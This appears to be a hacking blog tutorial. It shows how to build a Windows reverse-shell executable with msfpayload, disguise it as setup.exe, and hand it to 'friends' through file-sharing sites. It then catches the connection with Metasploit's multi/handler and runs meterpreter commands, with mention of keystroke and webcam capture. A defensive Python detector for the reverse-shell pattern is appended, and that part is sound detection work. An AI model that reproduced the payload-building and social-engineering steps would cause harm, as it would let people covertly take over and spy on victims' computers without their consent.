Yesterday I posted Exploiting Windows OS using Java signed applet code execution, exploiting a Windows vulnerability to log into the system without a username and password using Metasploit.
Today we are going to create our own payload as an executable binary to hack a Windows OS.
Let's look at how to create stand-alone Metasploit binary payloads with msfpayload. For starters, we'll create a simple reverse shell that connects back to the attacker and spawns a command shell. We'll use msfpayload and windows/shell_reverse_tcp. But first, let's look at the available options for the shell_reverse_tcp payload using the O flag.
#msfpayload windows/shell_reverse_tcp O
Now let's run msfpayload again and provide the options needed to create this payload in the Windows Portable Executable (PE) format. To do so, we pass the X option to select PE as our output format.
#msfpayload windows/shell_reverse_tcp LHOST=192.168.31.20 LPORT=666 X > /home/sathish/setup.exe
Check that the executable file is present at the output path.
Now upload this file (here, setup.exe) to a file sharing site such as MediaFire or 4shared and give the download link to your friends so they can download it.
Now that we have a working executable, we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse connections.
msf > use exploit/multi/handler
msf exploit(handler) > show options
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.31.20
msf exploit(handler) > set LPORT 666
We first use the multi/handler module and get a quick display of its options. Then we set our payload to a Windows reverse shell so that it matches the behavior of the executable we created earlier, tell it the IP and the port to listen on, and we're ready to go.
msf exploit(handler) > exploit
Once the victim has downloaded the file and run it on his computer, you will see the response on your machine.
This creates a session through which you can access the Windows machine. You will see that you have access to the victim's C drive, the drive on which the OS is installed. Type sysinfo to get system information about the victim's computer.
meterpreter > sysinfo
meterpreter > screenshot
This takes a screenshot of the current desktop. There are other meterpreter commands as well, such as recording keystrokes and capturing a snapshot from a webcam. To enter the command shell of the machine, type shell.
One more thing: all of this only works when the firewall and antivirus are disabled on the victim's computer.
This tutorial is intended for educational purposes only, and the author cannot be held liable for any damages done to your machine.
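From the defender's side, the behavior this payload produces on the victim is visible in endpoint telemetry: a binary run from a user-writable directory opens an outbound TCP connection to an unusual port and then spawns cmd.exe as its child. The following Python is an added example, not part of the original post; the Sysmon-style event records (ID 3 network connect, ID 1 process create), their field names and the sample values are constructed for the demonstration.

```python
"""Flag processes that connect out from a user-writable path and spawn a shell child,
the pattern a windows/shell_reverse_tcp executable leaves behind on the victim."""
from collections import defaultdict

# Constructed sample events (field names mirror Sysmon; values are invented).
EVENTS = [
    {"id": 1, "pid": 4120, "image": r"C:\Users\bob\Downloads\setup.exe",
     "ppid": 3000, "parent": r"C:\Windows\explorer.exe"},
    {"id": 3, "pid": 4120, "image": r"C:\Users\bob\Downloads\setup.exe",
     "dst_ip": "192.168.31.20", "dst_port": 666, "initiated": True},
    {"id": 1, "pid": 4188, "image": r"C:\Windows\System32\cmd.exe",
     "ppid": 4120, "parent": r"C:\Users\bob\Downloads\setup.exe"},
    {"id": 1, "pid": 5000, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ppid": 3000, "parent": r"C:\Windows\explorer.exe"},
    {"id": 3, "pid": 5000, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443, "initiated": True},
]

USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")   # paths a normal user can write to
COMMON_PORTS = {80, 443, 53, 445, 135, 139}                 # ports we do not treat as unusual
SHELLS = ("\\cmd.exe", "\\powershell.exe")                  # interpreters a reverse shell spawns


def is_user_writable(path):
    """True if the image lives under a directory an unprivileged user can write to."""
    return any(marker in path.lower() for marker in USER_WRITABLE)


def find_reverse_shells(events):
    """Return (pid, image, 'ip:port') for each process that both initiated an outbound
    connection to an unusual port from a user-writable path and spawned a shell child.
    Event order does not matter: connections and children are collected in one pass."""
    connects = {}                 # pid -> (image, destination)
    children = defaultdict(list)  # ppid -> [child image, ...]
    for ev in events:
        if (ev["id"] == 3 and ev.get("initiated")
                and ev["dst_port"] not in COMMON_PORTS and is_user_writable(ev["image"])):
            connects[ev["pid"]] = (ev["image"], f'{ev["dst_ip"]}:{ev["dst_port"]}')
        elif ev["id"] == 1:
            children[ev["ppid"]].append(ev["image"].lower())
    return [(pid, image, dst) for pid, (image, dst) in connects.items()
            if any(child.endswith(SHELLS) for child in children[pid])]


if __name__ == "__main__":
    for pid, image, dst in find_reverse_shells(EVENTS):
        print(f"suspected reverse shell: pid={pid} image={image} -> {dst}")
```

Firefox's connection to port 443 from Program Files is ignored, while setup.exe connecting to 192.168.31.20:666 and then spawning cmd.exe is reported.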